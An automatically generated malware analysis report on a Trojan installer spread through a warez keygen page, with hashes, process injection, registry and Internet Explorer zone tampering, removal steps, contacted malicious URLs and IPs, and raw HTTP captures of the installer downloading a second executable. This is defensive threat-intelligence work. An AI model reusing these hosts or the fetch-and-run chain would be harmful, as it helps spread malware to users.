Installer.Win32.InnoSetup.2.FD, Trojan.Win32.Sasfis.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan, Installer
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: dc5a034db8ab7049dc5f37a17ebcb9d9
SHA1: 8dd14e0e247b6f9cc39daf7a631941867bd114a2
SHA256: 0fab15afe571c86fc4660874b02bcd4dfe3c71dd99831c7974a0e87ed27b7adc
SSDeep: 24576:kiTAj2NdhIAtyY5pXKBOTH/XXvfmUDDhjqUPhZHZxWPY4h/2:kiMG9tyoxA8HfnmUPhjRbZxT4h
Size: 1010192 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: BorlandDelphi30, UPolyXv05_v6
Company: adsafiliados
Created at: 1992-06-20 01:22:17
Analyzed on: WindowsXP SP3 32-bit
Summary: Installer. An installation package.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Installer creates the following process(es):
%original file name%.exe:824
The Installer injects its code into the following process(es):
%original file name%.exe:1124
Mutexes
The following mutexes were created/opened:
__DDrawCheckExclMode____DDrawExclMode__DDrawDriverObjectListMutexDDrawWindowListMutexCTF.TMD.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003CTF.Layouts.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003CTF.Asm.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003CTF.Compart.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003CTF.LBES.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003RasPbFileWininetProxyRegistryMutexWininetConnectionMutexWininetStartupMutexc:!documents and settings!adm!local settings!history!history.ie5!c:!documents and settings!adm!cookies!c:!documents and settings!adm!local settings!temporary internet files!content.ie5!_!MSFTHISTORY!_ShimCacheMutexZonesLockedCacheCounterMutexZonesCacheCounterMutexZonesCounterMutex
File activity
The process %original file name%.exe:1124 makes changes in the file system.
The Installer creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\in1A1AEB34\57B0B0FE_stp.DAT.part (54 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0013C71C.log (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\locale\DLM\EN.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\ProgressBarD.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0013BEEE.log (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\locale\DLM\ES.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\Color_Button.png (385 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\csshover3.htc (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\BGD.jpg (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\mainDlm.css (8 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adswarez[1].txt (217 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (388 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\sdk-ui\images\progress-bg2.png (978 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\Resume_Button.png (718 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\sdk-ui\button.css (417 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\Close_Hover.png (170 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\Close.png (164 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\Color_Button_Hover.png (368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\in1A1AEB34\57B0B0FE_stp.DAT (1960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\YB33U3FA\logo4[1].png (1787 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\sponsored.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\sdk-ui\progress-bar.css (506 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\locale\DLM\PT.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\sdk-ui\checkbox.css (190 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\sdk-ui\images\progress-bg-corner.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\form.bmp.Mask (244 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\bootstrap_24546.html (156 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\ProgressD.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\sdk-ui\images\progress-bg.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0013C72B.log (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\Loader.gif (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\sdk-ui\browse.css (337 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\Welcome_BG.jpg (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\ie6_Dlm_main.css (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\sdk-ui\images\button-bg.png (131 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\Pause_Button.png (577 bytes)
The Installer deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\0013C71C.log (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\bootstrap_24546.html (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0013BEEE.log (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0013C72B.log (0 bytes)
Registry activity
The process %original file name%.exe:824 makes changes in the system registry.
The Installer creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3C 6F 92 D1 4D 3B D1 48 F9 7F 20 30 3A FD 54 C9"
The process %original file name%.exe:1124 makes changes in the system registry.
The Installer creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "%original file name%.exe"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "708992537"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5E E7 74 19 0A CA AD EA FD 6F 52 68 D1 FE 3D 99"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Installer modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Installer modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Installer modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Installer deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
| MD5 | File path |
|---|---|
| 399f8cefebd04b4bcc8c5db0b033aa69 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\in1A1AEB34\57B0B0FE_stp.DAT |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:824
- Delete the original Installer file.
- Delete or disinfect the following files created/modified by the Installer:
%Documents and Settings%\%current user%\Local Settings\Temp\in1A1AEB34\57B0B0FE_stp.DAT.part (54 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0013C71C.log (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\locale\DLM\EN.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\ProgressBarD.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0013BEEE.log (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\locale\DLM\ES.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\Color_Button.png (385 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\csshover3.htc (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\BGD.jpg (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\mainDlm.css (8 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adswarez[1].txt (217 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (388 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\sdk-ui\images\progress-bg2.png (978 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\Resume_Button.png (718 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\sdk-ui\button.css (417 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\Close_Hover.png (170 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\Close.png (164 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\Color_Button_Hover.png (368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\YB33U3FA\logo4[1].png (1787 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\sponsored.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\sdk-ui\progress-bar.css (506 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\locale\DLM\PT.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\sdk-ui\checkbox.css (190 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\sdk-ui\images\progress-bg-corner.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\form.bmp.Mask (244 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\bootstrap_24546.html (156 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\ProgressD.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\sdk-ui\images\progress-bg.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0013C72B.log (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\Loader.gif (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\sdk-ui\browse.css (337 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\Welcome_BG.jpg (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\ie6_Dlm_main.css (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\css\sdk-ui\images\button-bg.png (131 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH129410922309\images\Pause_Button.png (577 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: adsafiliados
Product Name: Installer Setup
Product Version: 1.0.5.a0.1_54944
Legal Copyright: adsafiliados
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.5.a0.1_54944
File Description: Installer Setup
Comments: This installation was built with Inno Setup.
Language: Language Neutral
Company Name: adsafiliadosProduct Name: Installer SetupProduct Version: 1.0.5.a0.1_54944Legal Copyright: adsafiliadosLegal Trademarks: Original Filename: Internal Name: File Version: 1.0.5.a0.1_54944File Description: Installer SetupComments: This installation was built with Inno Setup.Language: Language Neutral
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| CODE | 4096 | 40240 | 40448 | 4.64999 | dbda5ee849ef82a713855f811e7bfc14 |
| DATA | 45056 | 592 | 1024 | 1.90742 | 1ee71d84f1c77af85f1f5c278f880572 |
| BSS | 49152 | 3724 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .idata | 53248 | 2384 | 2560 | 3.07115 | bb5485bf968b970e5ea81292af2acdba |
| .tls | 57344 | 8 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .rdata | 61440 | 24 | 512 | 0.14174 | 9ba824905bf9c7922b6fc87a38b74366 |
| .reloc | 65536 | 2244 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .rsrc | 69632 | 11264 | 11264 | 3.10173 | 85e26c316dd351fa3b841914fb7ded69 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 23
da572766f44e7b5b01f230f184e2be6b
9bd659f802479a9bf3ccf7545ef9a1e4
28422dba23ed1f0a4e7be424f69bfc09
20af91ce088b16d260ed76a2614037b0
5c58c121061e8f79f3885326d8c5cb29
f1103ef51e63250cd835b8ad507dd24c
d0d8cec2d646fa7a0fb6c79d44e3b960
f762441fab5467efeabfaea3685f1806
6899505489192a5a9df7b30ee0babfaf
8ba398b18d09d8415a60149a70c535bd
eaeed4183ff17edc4384e353f43a76e1
a7a4010bdab7a0a66b95cb20b9fa0c3d
b3d549f05a832980a905d1b3a9f2a5ae
415bf2b54ca511831edeb9c21e2645e4
296174c8438a132b37a6b89d2dd61a50
4954d37f1446ae2dca81f1695d18190f
b162d3e830ee3694a36cf947f0d77709
1d5a622fedabcbd02b2677486b01fd4a
992848a79a13ecc7b491b8723311b73c
941bc0a52a496fe0ee77cece39d37d45
0869e43da1d44f256fa7fdf02f5743ad
c088309e24bea1c8893ed8b009d1e3ec
7f1ba36097afd10c60a316a734514982
Network Activity
URLs
| URL | IP |
|---|---|
| hxxp://os.fodidodasal.com/adsafiliados/?v=6.0&c=1856168701&t=1319218 | 54.194.194.239 |
| hxxp://ad5.adswarez.com/downloadimage/20467/16/b021a2773080bd3c2b70eee38c21b2a9/logo4.png?logotipo=automatico&uo=hxxp://www.masterkreatif.com/2015/03/vmware-vsphere-6-0-full-keygen.html&nada=true | 104.28.16.74 |
| hxxp://46.137.105.35/?v=2.0&subver=6.21&pcrc=913192198 | |
| hxxp://ad5.adswarez.com/comp/20467/16/QI9-uGkV1Y_pjD-dhOWilOdkGndKL1_G0wvjKuiI9nlNLUU4pmpMhogeyuNifkC6Nq_PTtkFpY9ygnU2d05_TCuqPFhlsXDj8DBs8sioMCQA7vRxVe-NyOgoKBh4RLfpl2z9JuG4tReOENNlFB_ineOdZW1xahChJDULvYreWMCbRcOJt4h1eBa2JQAB1HiXbGEFLQhNFQJVrRhs6C02zIjDQYRHYjKd8PbqPVDkeUNb40DiLasJvjbov5hoyp7SMl9JoyGzaC1mErOPmBNShfpAc1e73axqFBMMDVHaY_M.exe?plataforma=c1&&uo=hxxp://www.masterkreatif.com/2015/03/vmware-vsphere-6-0-full-keygen.html&ud=hxxp://www.masterkreatif.com/2015/03/vmware-vsphere-6-0-full-keygen.html | 104.28.16.74 |
| hxxp://162.243.100.13/?key=QI9-uGkV1Y_pjD-dhOWilOdkGndKL1_G0wvjKuiI9nlNLUU4pmpMhogeyuNifkC6Nq_PTtkFpY9ygnU2d05_TCuqPFhlsXDj8DBs8sioMCQA7vRxVe-NyOgoKBh4RLfpl2z9JuG4tReOENNlFB_ineOdZW1xahChJDULvYreWMCbRcOJt4h1eBa2JQAB1HiXbGEFLQhNFQJVrRhs6C02zIjDQYRHYjKd8PbqPVDkeUNb40DiLasJvjbov5hoyp7SMl9JoyGzaC1mErOPmBNShfpAc1e73axqFBMMDVHaY_M&ud=http://www.masterkreatif.com/2015/03/vmware-vsphere-6-0-full-keygen.html&n=VMware-vSphere-6.0-Full-Keygen | |
| hxxp://rp.Fodidodasal.com/?v=2.0&subver=6.21&pcrc=913192198 | |
| hxxp://os.Fodidodasal.com/adsafiliados/?v=6.0&c=1856168701&t=1319218 | |
| img.fodidodasal.com | 199.201.110.78 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /downloadimage/20467/16/b021a2773080bd3c2b70eee38c21b2a9/logo4.png?logotipo=automatico&uo=hXXp://VVV.masterkreatif.com/2015/03/vmware-vsphere-6-0-full-keygen.html&nada=true HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ad5.adswarez.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 24 Apr 2016 01:12:23 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=da1ba1e8871c52d5968eb36e219d271491461460342; expires=Mon, 24-Apr-17 01:12:22 GMT; path=/; domain=.adswarez.com; HttpOnly
X-Powered-By: PHP/5.5.7
CF-Cache-Status: MISS
Expires: Sun, 24 Apr 2016 05:12:23 GMT
Cache-Control: public, max-age=14400
Server: cloudflare-nginx
CF-RAY: 2985afc602132b21-WAW
2029...PNG........IHDR...n...n.....I9.... .IDATx..}Y.e.u...........M5.d7).....cIv,Y..(.!..b......`.F.#F....o..........8.....<.6,Y.D."eN..=...... .5...[M.....;.S.j..{..U...o.X[o.../_=........teskg..........o...........q.....P.D. H........g....C..|:i..{.._...n>.....7.......L...t..R.S=.....>....}..O..{............;?...F.....@.*...",..^......g.D3#.r!.9D.4b.....h.........{.q....o.6]..G...._...?~.......j....z.".".n.....%%........R.........XB8'|^].>.TM.Z.q,.........G_.../|.n..sc.#....6...}............s.9U..D....2"..n.S....i...Z......3..e.H..........b.].}..l..........w.u..G..h.......?.u...H......@......"..N.@.B..F#.l....HI....}...D..rH6....%[(e..k..S.6../....>:(?...~.S.....8..U.`....{.H.tU.%..L....O.8.S..\.AFJ...`..B.".OJ.^.....{.?x..GvB].. ./L.........E.)"$......PC...... ...R. Nf.....#.1.bHe.Dp...&.....C."..#..`..q.2|......b.'>s..w$4.?F.I.Q......@).9A.Q.0..O&o..X.z&W.. ......a.. .K....E?....n..~x...u..1.......Q?k]...$...!......Ej43.......K\..,,..D7.uK.....'b.Y.~..$......<...k..@y....g6z.*....vu.D./......uk%...f..*X'..H..i......J./...G.=..x......=.(......0R.*2.j2...k..pX"`]V...,.@E7b9...U.....N.....i.g-.&^..E.v[.H......wm...J..rH... .qA....*.L.....]l.z.f..2.%.T.G2..]K..8.`"..........G....&.9...X.4D@2..,.........V...I.G.>.$s..d$Q..(_I.w..R....ReR7..........@..e0/M....<..........n...73#=AXnvv......J4........h.$...]...]b[v...@.0..<.(O...BL..011.P.Uyz'................n6....."1.g..@...;L..g..V..O.k.52^o..G.....7j.o.C..(..)I..l.>....Et.I&&.....K....K_...?.u...{7f...z[,..{..>@.e5.......nZ..
<<< skipped >>>
HEAD /comp/20467/16/QI9-uGkV1Y_pjD-dhOWilOdkGndKL1_G0wvjKuiI9nlNLUU4pmpMhogeyuNifkC6Nq_PTtkFpY9ygnU2d05_TCuqPFhlsXDj8DBs8sioMCQA7vRxVe-NyOgoKBh4RLfpl2z9JuG4tReOENNlFB_ineOdZW1xahChJDULvYreWMCbRcOJt4h1eBa2JQAB1HiXbGEFLQhNFQJVrRhs6C02zIjDQYRHYjKd8PbqPVDkeUNb40DiLasJvjbov5hoyp7SMl9JoyGzaC1mErOPmBNShfpAc1e73axqFBMMDVHaY_M.exe?plataforma=c1&&uo=hXXp://VVV.masterkreatif.com/2015/03/vmware-vsphere-6-0-full-keygen.html&ud=hXXp://VVV.masterkreatif.com/2015/03/vmware-vsphere-6-0-full-keygen.html HTTP/1.1
Accept: */*
Host: ad5.adswarez.com
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0; ICDM 2.1)
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Found
Date: Sun, 24 Apr 2016 01:12:28 GMT
Content-Type: text/html
Connection: keep-alive
Set-Cookie: __cfduid=d33cf14d07fcd194a68138e7ca27ce2d11461460346; expires=Mon, 24-Apr-17 01:12:26 GMT; path=/; domain=.adswarez.com; HttpOnly
X-Powered-By: PHP/5.5.7
Location: hXXp://162.243.100.13/?key=QI9-uGkV1Y_pjD-dhOWilOdkGndKL1_G0wvjKuiI9nlNLUU4pmpMhogeyuNifkC6Nq_PTtkFpY9ygnU2d05_TCuqPFhlsXDj8DBs8sioMCQA7vRxVe-NyOgoKBh4RLfpl2z9JuG4tReOENNlFB_ineOdZW1xahChJDULvYreWMCbRcOJt4h1eBa2JQAB1HiXbGEFLQhNFQJVrRhs6C02zIjDQYRHYjKd8PbqPVDkeUNb40DiLasJvjbov5hoyp7SMl9JoyGzaC1mErOPmBNShfpAc1e73axqFBMMDVHaY_M&ud=http://VVV.masterkreatif.com/2015/03/vmware-vsphere-6-0-full-keygen.html&n=VMware-vSphere-6.0-Full-Keygen
Server: cloudflare-nginx
CF-RAY: 2985afdd33522b21-WAW
HTTP/1.1 302 Found..Date: Sun, 24 Apr 2016 01:12:28 GMT..Content-Type: text/html..Connection: keep-alive..Set-Cookie: __cfduid=d33cf14d07fcd194a68138e7ca27ce2d11461460346; expires=Mon, 24-Apr-17 01:12:26 GMT; path=/; domain=.adswarez.com; HttpOnly..X-Powered-By: PHP/5.5.7..Location: hXXp://162.243.100.13/?key=QI9-uGkV1Y_pjD-dhOWilOdkGndKL1_G0wvjKuiI9nlNLUU4pmpMhogeyuNifkC6Nq_PTtkFpY9ygnU2d05_TCuqPFhlsXDj8DBs8sioMCQA7vRxVe-NyOgoKBh4RLfpl2z9JuG4tReOENNlFB_ineOdZW1xahChJDULvYreWMCbRcOJt4h1eBa2JQAB1HiXbGEFLQhNFQJVrRhs6C02zIjDQYRHYjKd8PbqPVDkeUNb40DiLasJvjbov5hoyp7SMl9JoyGzaC1mErOPmBNShfpAc1e73axqFBMMDVHaY_M&ud=http://www.masterkreatif.com/2015/03/vmware-vsphere-6-0-full-keygen.html&n=VMware-vSphere-6.0-Full-Keygen..Server: cloudflare-nginx..CF-RAY: 2985afdd33522b21-WAW..
<<< skipped >>>
HEAD /?key=QI9-uGkV1Y_pjD-dhOWilOdkGndKL1_G0wvjKuiI9nlNLUU4pmpMhogeyuNifkC6Nq_PTtkFpY9ygnU2d05_TCuqPFhlsXDj8DBs8sioMCQA7vRxVe-NyOgoKBh4RLfpl2z9JuG4tReOENNlFB_ineOdZW1xahChJDULvYreWMCbRcOJt4h1eBa2JQAB1HiXbGEFLQhNFQJVrRhs6C02zIjDQYRHYjKd8PbqPVDkeUNb40DiLasJvjbov5hoyp7SMl9JoyGzaC1mErOPmBNShfpAc1e73axqFBMMDVHaY_M&ud=http://VVV.masterkreatif.com/2015/03/vmware-vsphere-6-0-full-keygen.html&n=VMware-vSphere-6.0-Full-Keygen HTTP/1.1
Accept: */*
Host: 162.243.100.13
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0; ICDM 2.1)
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 24 Apr 2016 01:12:28 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.3
Content-Disposition: attachment; filename=pixel.exe
Content-Description: File Transfer
Content-Length: 60658
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/force-download
GET /?key=QI9-uGkV1Y_pjD-dhOWilOdkGndKL1_G0wvjKuiI9nlNLUU4pmpMhogeyuNifkC6Nq_PTtkFpY9ygnU2d05_TCuqPFhlsXDj8DBs8sioMCQA7vRxVe-NyOgoKBh4RLfpl2z9JuG4tReOENNlFB_ineOdZW1xahChJDULvYreWMCbRcOJt4h1eBa2JQAB1HiXbGEFLQhNFQJVrRhs6C02zIjDQYRHYjKd8PbqPVDkeUNb40DiLasJvjbov5hoyp7SMl9JoyGzaC1mErOPmBNShfpAc1e73axqFBMMDVHaY_M&ud=http://VVV.masterkreatif.com/2015/03/vmware-vsphere-6-0-full-keygen.html&n=VMware-vSphere-6.0-Full-Keygen HTTP/1.1
Range: bytes=0-60657
Accept: */*
Host: 162.243.100.13
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0; ICDM 2.1)
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 24 Apr 2016 01:12:29 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.3
Content-Disposition: attachment; filename=pixel.exe
Content-Description: File Transfer
Content-Length: 60658
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/force-download
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................................................................t...........@...........................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...................................rsrc....@.......B...z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t 